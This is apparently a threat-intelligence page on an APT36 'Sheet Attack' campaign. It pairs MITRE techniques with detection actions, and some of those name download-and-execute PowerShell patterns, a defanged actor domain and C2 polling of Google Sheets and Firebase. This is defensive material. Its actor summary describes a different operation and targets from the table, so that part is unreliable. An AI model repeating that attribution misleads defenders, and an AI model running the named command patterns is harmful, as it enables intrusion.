
APT36 (Transparent Tribe) Sheet Attack Campaign
Indicators of Compromise
APT Groups1
Summary of Actor:Operation C-Major is a cyber espionage campaign attributed to a sophisticated threat group. The operation is known for targeting government and diplomatic entities in Eastern Europe and Central Asia. It employs a variety of attack vectors, including spear-phishing and malware. General Features:The group behind Operation C-Major is known for deploying custom malware and sophisticated evasion techniques. They are highly persistent and often use local language in their phishing campaigns to increase trust. Related Other Groups: APT28,Turla Indicators of Attack (IoA): Suspicious email attachments Unusual network traffic to external servers Usage of compromised legitimate credentials Recent Activities and Trends: Latest Campaigns : Recent campaigns have focused on exploiting vulnerabilities in widely-used software to gain initial access. There have been reports of increased phishing emails mimicking government communications. Emerging Trends : The group has shown a shift towards more sophisticated spear-phishing techniques, including the use of deepfake technology to impersonate key individuals. Additionally, there is an increased focus on zero-day vulnerabilities.
Campaign Guidance
Remediation, mitigation, notes, history and related intelligence
Source: attack.mitre.org
Technique ID | Technique Name | Detection ID | Detection Name | Recommended Detection Action |
|---|---|---|---|---|
Phishing: Spearphishing Attachment | DET0115 | Spearphishing Attachment Detection | Alert on email delivery of RTF files with OLE objects or LNK shortcuts to Indian government domains; inspect for CVE-2026-21509 shellcode triggers. | |
Phishing: Spearphishing Link | DET0116 | Spearphishing Link Detection | Block links directing Indian Windows users to threat-actor controlled ZIP delivery servers using geofencing + User-Agent checks (hcidoc[.]in). | |
User Execution: Malicious File | DET0294 | Malicious File Execution Detection | Alert on .LNK files opened from Downloads or Temp directories that spawn PowerShell with -e (Base64 encoded) or Invoke-RestMethod | iex. | |
Command and Scripting Interpreter: PowerShell | DET0455 | PowerShell Behavioral Detection | Detect irm [url] | iex patterns and PowerShell spawned by chrome.exe, edge.exe or non-browser binaries polling Firebase/Google Sheets. | |
Native API | DET0459 | Non-Standard Scripting Language Execution | Flag execution of binaries compiled in niche languages (Crystal, Nim, Zig) not present in standard software baselines on government endpoints. | |
Ingress Tool Transfer | DET0060 | Ingress Tool Transfer Detection | Monitor curl/PowerShell download of ZIP archives from actor-controlled domains; alert on hcidoc[.]in and similar typosquatted .in domains. | |
Modify Registry | DET0280 | Registry Modification Detection | Alert on scheduled task creation by PowerShell running from %USERPROFILE% that persists LNK-launched FIREPOWER at user logon. | |
Deobfuscate/Decode Files or Information | DET0275 | Deobfuscation/Decode Detection | Detect Assembly.Load of byte-reversed PE buffers (details.png reversal) via ETW or AMSI telemetry in .NET runtime. | |
Remote Access Tools | DET0496 | Remote Access Tool Detection | Flag non-IT-deployed remote access: SHEETCREEP polling Google Sheets every 3s, FIREPOWER polling Firebase every 120–300s, MAILCREEP polling Azure mailbox. | |
System Information Discovery | DET0190 | System Information Discovery Detection | Alert on PowerShell enumeration of C:\Program Files, %USERPROFILE%\Desktop, and Downloads immediately after LNK execution. | |
File and Directory Discovery | DET0192 | File and Directory Discovery Detection | Detect scanning of .txt, .csv, .pdf, .docx, .xlsx, .pptx, .html files in Desktop/Documents/OneDrive by non-user processes (document stealer). | |
Exfiltration Over Web Service: Exfiltration to Code Repository | DET0420 | Exfiltration to Code Repository Detection | Alert on git push or REST API calls to private GitHub repos from workstations during non-business hours (document stealer upload). | |
Event Triggered Execution: Trap | DET0145 | Scheduled Task / Logon Script Detection | Detect GServices.vbs registered as a logon scheduled task loading SHEETCREEP via PowerShell reflection at each user logon. | |
Unsecured Credentials: Credentials In Files | DET0200 | Credential in Files Detection | Alert on MAILCREEP reading credential material from the filesystem to authenticate against Microsoft Graph API / Azure tenant. | |
Application Layer Protocol: Web Protocols | DET0425 | C2 over Web Protocols Detection | Detect HTTPS C2 to Google Sheets API, Firebase Realtime Database, and Microsoft Graph API from non-browser processes; baseline normal traffic and alert on anomalies. |